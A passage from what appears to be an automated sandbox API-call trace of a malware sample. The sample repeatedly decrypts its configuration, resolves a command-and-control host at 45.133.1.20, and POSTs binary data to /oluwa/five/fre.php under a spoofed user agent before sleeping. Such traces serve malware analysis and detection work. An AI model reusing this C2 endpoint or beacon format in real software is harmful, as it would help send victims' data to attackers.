hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0308.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.156] CryptDestroyKey (hKey=0x6ad020) returned 1 [0308.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.157] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0308.157] GetProcessHeap () returned 0x6a0000 [0308.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0308.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.165] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0308.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.167] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0308.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.172] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0308.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.216] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0308.216] GetProcessHeap () returned 0x6a0000 [0308.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0308.216] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0308.217] GetProcessHeap () returned 0x6a0000 [0308.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0308.217] socket (af=2, type=1, protocol=6) returned 0xbac [0308.221] connect (s=0xbac, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0308.244] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0308.244] GetProcessHeap () returned 0x6a0000 [0308.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0308.244] GetProcessHeap () returned 0x6a0000 [0308.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0308.245] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0308.246] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0308.246] GetProcessHeap () returned 0x6a0000 [0308.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6cc0 [0308.246] GetProcessHeap () returned 0x6a0000 [0308.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0308.247] GetProcessHeap () returned 0x6a0000 [0308.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0308.247] GetProcessHeap () returned 0x6a0000 [0308.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0308.248] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0308.249] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0308.249] GetProcessHeap () returned 0x6a0000 [0308.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0308.249] GetProcessHeap () returned 0x6a0000 [0308.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0308.250] send (s=0xbac, buf=0x6bd460*, len=242, flags=0) returned 242 [0308.251] send (s=0xbac, buf=0x6bb998*, len=159, flags=0) returned 159 [0308.251] GetProcessHeap () returned 0x6a0000 [0308.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0308.251] recv (in: s=0xbac, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0308.411] GetProcessHeap () returned 0x6a0000 [0308.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0308.411] GetProcessHeap () returned 0x6a0000 [0308.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0308.412] GetProcessHeap () returned 0x6a0000 [0308.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6cc0 | out: hHeap=0x6a0000) returned 1 [0308.412] GetProcessHeap () returned 0x6a0000 [0308.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0308.414] closesocket (s=0xbac) returned 0 [0308.415] GetProcessHeap () returned 0x6a0000 [0308.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0308.415] GetProcessHeap () returned 0x6a0000 [0308.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0308.416] GetProcessHeap () returned 0x6a0000 [0308.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0308.416] GetProcessHeap () returned 0x6a0000 [0308.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0308.417] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18ec) returned 0xbac [0308.419] Sleep (dwMilliseconds=0xea60) [0308.421] GetProcessHeap () returned 0x6a0000 [0308.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0308.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.423] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0308.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.433] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0308.445] GetProcessHeap () returned 0x6a0000 [0308.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0308.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.454] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0308.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.455] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0308.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.456] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0308.456] GetProcessHeap () returned 0x6a0000 [0308.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0308.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.460] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0308.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.461] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0308.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.463] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0308.463] GetProcessHeap () returned 0x6a0000 [0308.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0308.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.464] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0308.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.465] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0308.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.466] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0308.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.467] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0308.467] GetProcessHeap () returned 0x6a0000 [0308.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0308.467] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0308.468] GetProcessHeap () returned 0x6a0000 [0308.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0308.471] GetProcessHeap () returned 0x6a0000 [0308.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0308.472] GetProcessHeap () returned 0x6a0000 [0308.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0308.473] GetProcessHeap () returned 0x6a0000 [0308.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0308.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.474] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0308.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.486] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0308.500] GetProcessHeap () returned 0x6a0000 [0308.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0308.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.503] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0308.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.505] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0308.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.506] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0308.506] GetProcessHeap () returned 0x6a0000 [0308.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0308.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.514] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0308.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.515] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0308.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.517] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0308.517] GetProcessHeap () returned 0x6a0000 [0308.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0308.517] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.518] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0308.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.519] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0308.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.520] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0308.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.522] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0308.522] GetProcessHeap () returned 0x6a0000 [0308.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0308.522] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0308.522] GetProcessHeap () returned 0x6a0000 [0308.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0308.522] socket (af=2, type=1, protocol=6) returned 0xbb0 [0308.525] connect (s=0xbb0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0308.561] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0308.583] GetProcessHeap () returned 0x6a0000 [0308.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0308.583] GetProcessHeap () returned 0x6a0000 [0308.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0308.584] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0308.585] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0308.585] GetProcessHeap () returned 0x6a0000 [0308.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b66c0 [0308.585] GetProcessHeap () returned 0x6a0000 [0308.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0308.586] GetProcessHeap () returned 0x6a0000 [0308.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0308.586] GetProcessHeap () returned 0x6a0000 [0308.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0308.587] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0308.588] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0308.588] GetProcessHeap () returned 0x6a0000 [0308.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0308.588] GetProcessHeap () returned 0x6a0000 [0308.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0308.588] send (s=0xbb0, buf=0x6bd460*, len=242, flags=0) returned 242 [0308.589] send (s=0xbb0, buf=0x6bb998*, len=159, flags=0) returned 159 [0308.589] GetProcessHeap () returned 0x6a0000 [0308.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0308.589] recv (in: s=0xbb0, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0308.687] GetProcessHeap () returned 0x6a0000 [0308.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0308.689] GetProcessHeap () returned 0x6a0000 [0308.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0308.690] GetProcessHeap () returned 0x6a0000 [0308.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b66c0 | out: hHeap=0x6a0000) returned 1 [0308.690] GetProcessHeap () returned 0x6a0000 [0308.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0308.691] closesocket (s=0xbb0) returned 0 [0308.692] GetProcessHeap () returned 0x6a0000 [0308.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0308.694] GetProcessHeap () returned 0x6a0000 [0308.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0308.694] GetProcessHeap () returned 0x6a0000 [0308.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0308.695] GetProcessHeap () returned 0x6a0000 [0308.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0308.696] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18f0) returned 0xbb0 [0308.698] Sleep (dwMilliseconds=0xea60) [0308.700] GetProcessHeap () returned 0x6a0000 [0308.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0308.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.701] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0308.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.721] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0308.732] GetProcessHeap () returned 0x6a0000 [0308.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0308.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.734] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0308.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.802] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0308.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.806] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0308.806] GetProcessHeap () returned 0x6a0000 [0308.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0308.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.808] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0308.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.810] CryptDestroyKey (hKey=0x6ad020) returned 1 [0308.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.811] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0308.811] GetProcessHeap () returned 0x6a0000 [0308.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0308.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.813] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0308.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.819] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0308.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.820] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0308.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.821] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0308.821] GetProcessHeap () returned 0x6a0000 [0308.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0308.821] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0308.822] GetProcessHeap () returned 0x6a0000 [0308.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0308.822] GetProcessHeap () returned 0x6a0000 [0308.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0308.823] GetProcessHeap () returned 0x6a0000 [0308.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0308.823] GetProcessHeap () returned 0x6a0000 [0308.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0308.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.828] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0308.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.834] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0308.843] GetProcessHeap () returned 0x6a0000 [0308.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0308.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.844] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0308.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.845] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0308.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.849] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0308.850] GetProcessHeap () returned 0x6a0000 [0308.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0308.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.852] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0308.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.853] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0308.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.854] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0308.854] GetProcessHeap () returned 0x6a0000 [0308.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0308.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.855] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0308.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.857] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0308.860] LoadLibraryW 